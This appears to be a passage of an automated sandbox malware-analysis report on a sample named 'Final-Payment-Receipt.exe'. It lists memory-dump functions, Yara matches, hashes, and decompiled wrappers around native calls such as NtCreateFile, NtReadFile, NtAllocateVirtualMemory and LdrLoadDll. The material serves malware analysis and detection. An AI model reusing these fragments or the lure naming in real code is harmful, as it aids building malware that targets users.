                                                • API String ID: 947044025-0
                                                • Opcode ID: 9f5a8e82745c0d9490ed5e5eba01cba792392a76f2fa8e40041234d7511e74a0
                                                • Instruction ID: 5bef50701f0bec8cacb5820992d63db18d9633e7346b18d4d078136446647244
                                                • Opcode Fuzzy Hash: 9f5a8e82745c0d9490ed5e5eba01cba792392a76f2fa8e40041234d7511e74a0
                                                • Instruction Fuzzy Hash: 6EF0E2B69083408EDB20E7A898543DEFBE1BF61254F19485AC09AA3262D7789446C791
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0056D4D8, Relevance: .1, Instructions: 75COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232066859.000000000056D000.00000040.00000001.sdmp, Offset: 0056D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1ab6f983239a853fe100fb32adb2da8c3470ae3daec1787d7ae5cc26ce8c03dd
                                                • Instruction ID: 2560844b19a3b2027306497d915335e123022b45c897f0ede2ace06857ad9e72
                                                • Opcode Fuzzy Hash: 1ab6f983239a853fe100fb32adb2da8c3470ae3daec1787d7ae5cc26ce8c03dd
                                                • Instruction Fuzzy Hash: D3213AB2A04244DFCB15DF10D9C0F26BF75FBA8328F248969D9064B656C336D855CBB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0057D01C, Relevance: .1, Instructions: 72COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232100693.000000000057D000.00000040.00000001.sdmp, Offset: 0057D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: d4e05c5bbd46614eaacb51b4815790c42c31de2e9a0f9569cf57a6945e236bad
                                                • Instruction ID: fefb1ce2d3e83328b6da0c57da1b08dc2aa9bef801b3ef451432fac7651118cf
                                                • Opcode Fuzzy Hash: d4e05c5bbd46614eaacb51b4815790c42c31de2e9a0f9569cf57a6945e236bad
                                                • Instruction Fuzzy Hash: A821CFB5608244DFCB14DF10E9C8B26BFB5FB88314F24C969D90D4B246D33AD846EA61
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0057D006, Relevance: .1, Instructions: 62COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232100693.000000000057D000.00000040.00000001.sdmp, Offset: 0057D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 25297efda63679b008eb2beab428531b5a937c76e571557f7ea221e3ed31cf4e
                                                • Instruction ID: ab7ecb6b220d0a13f26b55f8a735493caf3dc98799ee25878e5e56d299bb6454
                                                • Opcode Fuzzy Hash: 25297efda63679b008eb2beab428531b5a937c76e571557f7ea221e3ed31cf4e
                                                • Instruction Fuzzy Hash: 0F217C755093C08FCB02CF24D994B15BF71EF46314F29C5EAD8498B6A7C33A981ACB62
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0056D4D3, Relevance: .1, Instructions: 56COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232066859.000000000056D000.00000040.00000001.sdmp, Offset: 0056D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c882c93dbca158d7b41445731157c2addb0e79c4bdd91a6dfa13bb67bb808dc4
                                                • Instruction ID: d3f71dea954c23ce64d52f5da8332123b27cf4ddc540dae75d1f362e8e4a071f
                                                • Opcode Fuzzy Hash: c882c93dbca158d7b41445731157c2addb0e79c4bdd91a6dfa13bb67bb808dc4
                                                • Instruction Fuzzy Hash: C211B676904280DFCF15CF14D9C4B56BF71FB98324F28C6A9D80A4B656C33AD856CBA1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0056D749, Relevance: .0, Instructions: 45COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232066859.000000000056D000.00000040.00000001.sdmp, Offset: 0056D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 917061e42518bb3dc295881e5535a12227dc4deb4ed34eab442c6201159aecb7
                                                • Instruction ID: 4e4f0aeebba23d7c37619772b02b6b9c78f1a7118d31b666b9b614740a154bb9
                                                • Opcode Fuzzy Hash: 917061e42518bb3dc295881e5535a12227dc4deb4ed34eab442c6201159aecb7
                                                • Instruction Fuzzy Hash: BA01A771A083849AE7204A15DDC4766FFE8FF51734F188D5AED045B246C779A844C6B2
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0056D748, Relevance: .0, Instructions: 36COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232066859.000000000056D000.00000040.00000001.sdmp, Offset: 0056D000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: ebced2cd1ff2cfc543b2cd3c51b89c22f30f286c9ce5f9b0b7b15da1029b18a2
                                                • Instruction ID: a76c2498477f02d6de447fcc18fa3e7a8f02fc1643e0bc17e9fbb805cc814a43
                                                • Opcode Fuzzy Hash: ebced2cd1ff2cfc543b2cd3c51b89c22f30f286c9ce5f9b0b7b15da1029b18a2
                                                • Instruction Fuzzy Hash: 10F012719083849EEB108A16DDC4B62FFE8EB91774F18C55AED085B286C779A844CAB1
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Non-executed Functions

                                                Function 049280A0, Relevance: 4.5, Strings: 3, Instructions: 721COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.235870418.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: TOW$TOW$TOW
                                                • API String ID: 0-3270659114
                                                • Opcode ID: 9ddedf4d20b23ca66ec015b918a69bf768905b5b57c18e01bf3d760b1813c00b
                                                • Instruction ID: ea6bca95ba510b4d8a84718481ffbcf82b8c5f95bfe340a59d36d75144ee2e61
                                                • Opcode Fuzzy Hash: 9ddedf4d20b23ca66ec015b918a69bf768905b5b57c18e01bf3d760b1813c00b
                                                • Instruction Fuzzy Hash: C3528234B00125DFCB14EF69C584A6EB7B6FF88354B158669E816EB369DB30EC01CB91
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 055E6A50, Relevance: 1.7, Strings: 1, Instructions: 435COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 268954f0d67b5398eab0ccd331312ac48397b7baed2fe3d7b19036a474136bab
                                                • Instruction ID: bfa78cda7d5ffc793ca0a9011a29601a5dd009f3cd8d710337f2660e45f6b4f3
                                                • Opcode Fuzzy Hash: 268954f0d67b5398eab0ccd331312ac48397b7baed2fe3d7b19036a474136bab
                                                • Instruction Fuzzy Hash: 6912CE74E04228CFDB58CFA9D984AEDBBB2FF88314F148169E909AB245D7349D85CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 055E01E0, Relevance: 1.7, Strings: 1, Instructions: 434COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 1614c22aa684dd1985f5e8fdf7a427b62181d9c246ddab8e19345b658c37d4ea
                                                • Instruction ID: 0f09d225667fc47593f7b68fa3834189d379447479c3302c420ff15e8a9c227b
                                                • Opcode Fuzzy Hash: 1614c22aa684dd1985f5e8fdf7a427b62181d9c246ddab8e19345b658c37d4ea
                                                • Instruction Fuzzy Hash: EB12AD75E002188FDB18CFA9D988AEDBBF2FF88304F248169E509AB255D7749D81CF50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04926E98, Relevance: 1.6, Strings: 1, Instructions: 372COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.235870418.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID: W
                                                • API String ID: 0-655174618
                                                • Opcode ID: cbe179e219b8a592e01fbbd0c3eb2e13bde79eb74f62f924b806edb1f82131aa
                                                • Instruction ID: 7df154ee4408c175a19c1ef54d8029f224b709acc664f7a73d5b73bae8fa7538
                                                • Opcode Fuzzy Hash: cbe179e219b8a592e01fbbd0c3eb2e13bde79eb74f62f924b806edb1f82131aa
                                                • Instruction Fuzzy Hash: 47128C74E412288FDB64DF65CD91BEDBBB2BF88300F1080AAD619AB251DB305E81CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 055E6A41, Relevance: 1.4, Strings: 1, Instructions: 144COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 813de10fd23f13ac134cddff16032fe836bb9877efc071adb454d50649eb2154
                                                • Instruction ID: 3c6e93a3a514cb2771fb07be2aa17f213abfaffaa106bbca0011bbe5649dafbb
                                                • Opcode Fuzzy Hash: 813de10fd23f13ac134cddff16032fe836bb9877efc071adb454d50649eb2154
                                                • Instruction Fuzzy Hash: F4619FB5E042188FEB58CFAAD8447DDBBF2BF88310F14C0AAD509A7255EB345A85CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 055E01D0, Relevance: 1.4, Strings: 1, Instructions: 140COMMON
                                                Download Yara Rule
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.236223104.00000000055E0000.00000040.00000001.sdmp, Offset: 055E0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID: 0-3916222277
                                                • Opcode ID: 5a3465889ea15459a0eb636048b5c80a4e2fe1dcc889018e6ad76c5c87041874
                                                • Instruction ID: e04464ac6ddf538da5035d5c93eae63593638704cfbaf93696a3c107ab66083e
                                                • Opcode Fuzzy Hash: 5a3465889ea15459a0eb636048b5c80a4e2fe1dcc889018e6ad76c5c87041874
                                                • Instruction Fuzzy Hash: A551C3B5E042188FDB58CFAAC8447DEFBF2BF89304F14C0AAD508A7255EB745A858F51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008BC2B0, Relevance: .5, Instructions: 522COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 998361b8ea397cd5bad3206a083ab8fa5f83608332c5d9dce11847fecb2598e7
                                                • Instruction ID: 1f5c32498f38a13a41ff819be5c0c98c6c350cfae19a28a49937408110406178
                                                • Opcode Fuzzy Hash: 998361b8ea397cd5bad3206a083ab8fa5f83608332c5d9dce11847fecb2598e7
                                                • Instruction Fuzzy Hash: 585207B1900B068FE730CF18EC985A97BB1FB44318B914728D6699BBA0DBF465C6CF44
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 04926EA8, Relevance: .4, Instructions: 368COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.235870418.0000000004920000.00000040.00000001.sdmp, Offset: 04920000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 1f68b4f0b35503d4261635b083b0413b436b99e2dae3cb1de15e8579526fdd5b
                                                • Instruction ID: f542bf36e4daf1e3b06481ac6097e81b7b14f1ff976f2eb8aeec081efed60b97
                                                • Opcode Fuzzy Hash: 1f68b4f0b35503d4261635b083b0413b436b99e2dae3cb1de15e8579526fdd5b
                                                • Instruction Fuzzy Hash: D8028C74E412289FDB64DF65CD91BEDBBB2BF88300F1080AAD619AB255DB305E81CF51
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008B9970, Relevance: .3, Instructions: 265COMMON
                                                Download Yara Rule
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.232556555.00000000008B0000.00000040.00000001.sdmp, Offset: 008B0000, based on PE: false
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c8b733b5adedaa8d5882472fc2c65843c393b3c16ce84a0ba0621d871a083fea
                                                • Instruction ID: 9e230db9ac87195f3736a7f9ee6b1704cf82d01db21f8c7f453415ed4f879582
                                                • Opcode Fuzzy Hash: c8b733b5adedaa8d5882472fc2c65843c393b3c16ce84a0ba0621d871a083fea
                                                • Instruction Fuzzy Hash: EDA14A32E006198FCF15DFA5C8445EEBBB2FF89304B15856AE906EB321EB71A955CB40
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Analysis Process: Final-Payment-Receipt.exe PID: 5764 Parent PID: 1692 Final-Payment-Receipt.exeCOMMON

                                                Executed Functions

                                                Function 00419E1F, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 37%
                                                			E00419E1F(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				signed int _v117;
				void* _t20;
				void* _t29;
				void* _t30;
				intOrPtr* _t31;
				void* _t33;

				_v117 =  !_v117;
				_t15 = _a4;
				_t31 = _a4 + 0xc48;
				E0041A970(_t29, _t15, _t31,  *((intOrPtr*)(_t15 + 0x10)), 0, 0x2a);
				_t8 =  &_a32; // 0x414d42
				_t14 =  &_a8; // 0x414d42
				_t20 =  *((intOrPtr*)( *_t31))( *_t14, _a12, _a16, _a20, _a24, _a28,  *_t8, _a36, _a40, _t30, _t33); // executed
				return _t20;
			}









                                                0x00419e1f
                                                0x00419e23
                                                0x00419e2f
                                                0x00419e37
                                                0x00419e42
                                                0x00419e5d
                                                0x00419e65
                                                0x00419e69

                                                APIs
                                                • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E65
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: BMA$BMA
                                                • API String ID: 2738559852-2163208940
                                                • Opcode ID: 0e1c9e59ed7494fe24f37eea4461a8d34575f0e1a94b8b8c867b8ba6f9655b90
                                                • Instruction ID: b915cd863724d9d7b4668632913c965a756df9fb5d84bd9cc02811405dea9c89
                                                • Opcode Fuzzy Hash: 0e1c9e59ed7494fe24f37eea4461a8d34575f0e1a94b8b8c867b8ba6f9655b90
                                                • Instruction Fuzzy Hash: F9F0A4B6200108AFCB14DF99DC81EEB77A9EF8C354F158649BA1DA7251D630E851CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419E20, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 37%
                                                			E00419E20(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, intOrPtr _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E0041A970(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t6 =  &_a32; // 0x414d42
				_t12 =  &_a8; // 0x414d42
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36, _a40); // executed
				return _t18;
			}






                                                0x00419e23
                                                0x00419e2f
                                                0x00419e37
                                                0x00419e42
                                                0x00419e5d
                                                0x00419e65
                                                0x00419e69

                                                APIs
                                                • NtReadFile.NTDLL(BMA,5EB6522D,FFFFFFFF,00414A01,?,?,BMA,?,00414A01,FFFFFFFF,5EB6522D,00414D42,?,00000000), ref: 00419E65
                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: FileRead
                                                • String ID: BMA$BMA
                                                • API String ID: 2738559852-2163208940
                                                • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction ID: 476f5ca6c1c8a702652738fcb96128002e75f3d9711df63c28b58529865989e9
                                                • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                • Instruction Fuzzy Hash: BCF0F4B2200208ABCB04DF89CC80EEB77ADAF8C754F018248BA0D97241C630E8518BA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0040ACD0, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E0040ACD0(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041C660( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041CA80(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041CD00( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E0041AEB0(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                0x0040acec
                                                0x0040acef
                                                0x0040acf4
                                                0x0040acf9
                                                0x0040ad03
                                                0x0040ad08
                                                0x0040ad0b
                                                0x0040ad0d
                                                0x0040ad15
                                                0x0040ad1a
                                                0x0040ad1a
                                                0x0040ad21
                                                0x0040ad29
                                                0x0040ad2c
                                                0x0040ad2e
                                                0x0040ad42
                                                0x00000000
                                                0x0040ad44
                                                0x0040ad4a
                                                0x0040acfe
                                                0x0040acfe
                                                0x0040acfe

                                                APIs
                                                • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD42
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Load
                                                • String ID:
                                                • API String ID: 2234796835-0
                                                • Opcode ID: 40338038c26fc98c5705ab367eec9ae286094f0bf701fb2e8c536a963aaa0826
                                                • Instruction ID: 201280aab8f5eb3f9a78e4804a46a8fe5c00921239f195b3ae597ca63712bd74
                                                • Opcode Fuzzy Hash: 40338038c26fc98c5705ab367eec9ae286094f0bf701fb2e8c536a963aaa0826
                                                • Instruction Fuzzy Hash: 100152B5D4020DB7DB10DAA5DC46FDEB7789F54308F0041A9E909A7281F634EB548B95
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419D70, Relevance: 1.5, APIs: 1, Instructions: 40filenativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00419D70(intOrPtr _a4, HANDLE* _a8, long _a12, struct _EXCEPTION_RECORD _a16, struct _ERESOURCE_LITE _a20, struct _GUID _a24, long _a28, long _a32, long _a36, long _a40, void* _a44, long _a48) {
				long _t21;
				void* _t31;

				_t3 = _a4 + 0xc40; // 0xc40
				E0041A970(_t31, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x28);
				_t21 = NtCreateFile(_a8, _a12, _a16, _a20, _a24, _a28, _a32, _a36, _a40, _a44, _a48); // executed
				return _t21;
			}





                                                0x00419d7f
                                                0x00419d87
                                                0x00419dbd
                                                0x00419dc1

                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DBD
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction ID: 25fb7c75c950e795cab2cc759816c0849ff70043d466e737eb5d68fc7603115a
                                                • Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
                                                • Instruction Fuzzy Hash: 90F0BDB2211208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419F4C, Relevance: 1.5, APIs: 1, Instructions: 32memorynativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 64%
                                                			E00419F4C(void* __ecx, intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				char _v1;
				long _t14;
				void* _t23;

				asm("adc ah, 0x55");
				_push( &_v1);
				_t10 = _a4;
				_t3 = _t10 + 0xc60; // 0xca0
				E0041A970(_t23, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}






                                                0x00419f4e
                                                0x00419f50
                                                0x00419f53
                                                0x00419f5f
                                                0x00419f67
                                                0x00419f89
                                                0x00419f8d

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB44,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F89
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: f6f0b874c68b2748c1e0c58e1ec8eb4039ddcb106a6dbd27666f9ecda3ed5846
                                                • Instruction ID: 5a3cfdf32fe8243f3eb1e4fcd3f5b2d2adc7ef4acfdff428813164ccb4bd21f1
                                                • Opcode Fuzzy Hash: f6f0b874c68b2748c1e0c58e1ec8eb4039ddcb106a6dbd27666f9ecda3ed5846
                                                • Instruction Fuzzy Hash: 69F01CB5210208ABDB14DF89CC85EE777ADEF8C354F158649FE5897251C635E811CBA0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419F50, Relevance: 1.5, APIs: 1, Instructions: 30memorynativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00419F50(intOrPtr _a4, void* _a8, PVOID* _a12, long _a16, long* _a20, long _a24, long _a28) {
				long _t14;
				void* _t21;

				_t3 = _a4 + 0xc60; // 0xca0
				E0041A970(_t21, _a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x30);
				_t14 = NtAllocateVirtualMemory(_a8, _a12, _a16, _a20, _a24, _a28); // executed
				return _t14;
			}





                                                0x00419f5f
                                                0x00419f67
                                                0x00419f89
                                                0x00419f8d

                                                APIs
                                                • NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041AB44,?,00000000,?,00003000,00000040,00000000,00000000,00409CD3), ref: 00419F89
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: AllocateMemoryVirtual
                                                • String ID:
                                                • API String ID: 2167126740-0
                                                • Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction ID: 21dee396b526e9f6bcc5eeecb5e8ad732dc14a9aca5d94e75c0c980f3e103e8d
                                                • Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
                                                • Instruction Fuzzy Hash: 6BF015B6210208ABCB14DF89CC81EEB77ADAF88754F118549BE0897241C630F810CBB4
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419EA0, Relevance: 1.5, APIs: 1, Instructions: 20nativeCOMMON
                                                Download Yara Rule
                                                C-Code - Quality: 100%
                                                			E00419EA0(intOrPtr _a4, void* _a8) {
				long _t8;
				void* _t11;

				_t5 = _a4;
				_t2 = _t5 + 0x10; // 0x300
				_t3 = _t5 + 0xc50; // 0x40a923
				E0041A970(_t11, _a4, _t3,  *_t2, 0, 0x2c);
				_t8 = NtClose(_a8); // executed
				return _t8;
			}





                                                0x00419ea3
                                                0x00419ea6
                                                0x00419eaf
                                                0x00419eb7
                                                0x00419ec5
                                                0x00419ec9

                                                APIs
                                                • NtClose.NTDLL(00414D20,?,?,00414D20,00409CD3,FFFFFFFF), ref: 00419EC5
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: Close
                                                • String ID:
                                                • API String ID: 3535843008-0
                                                • Opcode ID: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction ID: 54e25ba9a063552adfd9097ed26e51ad785c9dec3e015c3cab780b8acab33ba6
                                                • Opcode Fuzzy Hash: 462dc2fd90f57a4a7913ee6487bbcc8fe2490777b3746e68c632e34f0b64e1a4
                                                • Instruction Fuzzy Hash: 67D01776200214ABD710EBD9CC85EE77BACEF48760F154499BA589B242C530FA508AE0
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 00419DC2, Relevance: 1.5, APIs: 1, Instructions: 9filenativeCOMMON
                                                Download Yara Rule
                                                APIs
                                                • NtCreateFile.NTDLL(00000060,00409CD3,?,00414B87,00409CD3,FFFFFFFF,?,?,FFFFFFFF,00409CD3,00414B87,?,00409CD3,00000060,00000000,00000000), ref: 00419DBD
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.261423165.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                Yara matches
                                                Similarity
                                                • API ID: CreateFile
                                                • String ID:
                                                • API String ID: 823142352-0
                                                • Opcode ID: 4caea93c985a3daf38a5c759d67712257434c1700a17d71f4b93b9c902b04769
                                                • Instruction ID: 4ca1a7800acb8243972310540f015a5e789b5bacda12d0f12d03eae91e97aea0
                                                • Opcode Fuzzy Hash: 4caea93c985a3daf38a5c759d67712257434c1700a17d71f4b93b9c902b04769
                                                • Instruction Fuzzy Hash: E9B01267D047340A1C1852F438494F6034C81C06E2314005BD90D57B04551E0C2152DD
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9910, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: cbae780f05d63a31347b744fabc71ef832c30fc6859235cbe8f819f0b307736d
                                                • Instruction ID: 6ee5b66d91df4863ca0f65b62923ed621826fe6eeeb6f3d5b0269dc6c73e767e
                                                • Opcode Fuzzy Hash: cbae780f05d63a31347b744fabc71ef832c30fc6859235cbe8f819f0b307736d
                                                • Instruction Fuzzy Hash: 359002B160500402D14171DA44047460005A7D0341F51C022A5054559EC7F98DD976A5
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F99A0, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
                                                • Opcode ID: 9f6b9d5bf9c446dd1758783bb41457daa799ab180bb442e4537beb95e848b83a
                                                • Instruction ID: db02e5eb289a22092d2a3e123280c06b14dc2c48f1087b9a15020beb1158e0c8
                                                • Opcode Fuzzy Hash: 9f6b9d5bf9c446dd1758783bb41457daa799ab180bb442e4537beb95e848b83a
                                                • Instruction Fuzzy Hash: B89002A174500442D10161DA4414B060005E7E1341F51C026E1054559DC7B9CC567166
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 013F9860, Relevance: 1.5, APIs: 1, Instructions: 4libraryCOMMON
                                                Download Yara Rule
                                                APIs
                                                Memory Dump Source
                                                • Source File: 00000001.00000002.263305899.0000000001390000.00000040.00000001.sdmp, Offset: 01390000, based on PE: true
                                                Similarity
                                                • API ID: InitializeThunk
                                                • String ID:
                                                • API String ID: 2994545307-0
